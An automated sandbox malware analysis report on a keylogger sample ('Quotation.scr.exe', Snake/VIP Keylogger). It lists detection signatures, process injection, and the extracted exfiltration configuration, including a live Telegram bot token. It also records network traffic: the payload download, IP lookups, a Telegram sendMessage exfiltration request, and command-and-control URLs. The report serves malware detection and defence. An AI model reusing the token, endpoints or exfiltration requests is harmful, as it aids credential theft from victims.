Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.scr.exe

Overview

General Information

Sample name:Quotation.scr.exe
Analysis ID:1507754
MD5:e0a5ee16dd5018801a0afadb2559b555
SHA1:26443711531805d3e268212b552632558e90a015
SHA256:6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quotation.scr.exe (PID: 3108 cmdline: "C:\Users\user\Desktop\Quotation.scr.exe" MD5: E0A5EE16DD5018801A0AFADB2559B555)
    • RegAsm.exe (PID: 2432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d604:$a1: get_encryptedPassword
          • 0x2d921:$a2: get_encryptedUsername
          • 0x2d414:$a3: get_timePasswordChanged
          • 0x2d51d:$a4: get_passwordField
          • 0x2d61a:$a5: set_encryptedPassword
          • 0x2ecf8:$a7: get_logins
          • 0x2ec5b:$a10: KeyLoggerEventArgs
          • 0x2e8c0:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Quotation.scr.exe.5790000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            2.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                2.2.RegAsm.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  2.2.RegAsm.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 23 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T08:55:17.814271+020028033053Unknown Traffic192.168.2.649719188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T08:55:16.251452+020028032742Potentially Bad Traffic192.168.2.649713132.226.8.16980TCP
                    2024-09-09T08:55:17.251451+020028032742Potentially Bad Traffic192.168.2.649713132.226.8.16980TCP
                    2024-09-09T08:55:18.642109+020028032742Potentially Bad Traffic192.168.2.649720132.226.8.16980TCP
                    2024-09-09T08:55:21.173447+020028032742Potentially Bad Traffic192.168.2.649723132.226.8.16980TCP
                    2024-09-09T08:55:23.548357+020028032742Potentially Bad Traffic192.168.2.649725132.226.8.16980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Quotation.scr.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Found malware configuration
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}
                    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}
                    Multi AV Scanner detection for submitted file
                    Source: Quotation.scr.exeVirustotal: Detection: 28%Perma Link
                    Source: Quotation.scr.exeReversingLabs: Detection: 31%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: Quotation.scr.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Quotation.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2
                    Source: Quotation.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586B850h0_2_0586B790
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586B850h0_2_0586B798
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_05864FD0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_05864FE0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_058651D0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586490Ch0_2_05864899
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586490Ch0_2_058648A8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D4C3Ch0_2_058D4BB0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D1546
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D144B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D1458
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_058D0006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_058D0040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0593D578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DF5C5h2_2_012DF428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DF5C5h2_2_012DF614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DFD81h2_2_012DFAC8

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /Mytiypg.vdf HTTP/1.1Host: eg-mart.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49725 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49719 -> 188.114.96.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /Mytiypg.vdf HTTP/1.1Host: eg-mart.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: eg-mart.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 09 Sep 2024 06:55:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eg-mart.com
                    Source: Quotation.scr.exeString found in binary or memory: https://eg-mart.com/Mytiypg.vdf
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
